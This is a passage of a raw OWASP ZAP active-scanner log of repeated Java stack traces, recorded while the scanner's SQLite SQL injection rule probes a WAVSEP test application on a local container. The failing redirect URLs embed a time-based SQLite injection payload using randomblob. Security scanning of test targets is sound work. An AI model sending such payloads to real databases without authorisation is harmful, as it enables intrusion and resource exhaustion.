org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11215296 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215496 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215496 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215697 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215698 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215898 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215898 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11216094 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11216105 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11216297 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.lang.IllegalStateException: unsupported protocol: 'httk' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11216300 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11216499 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11216502 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11216701 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11217102 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11217102 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 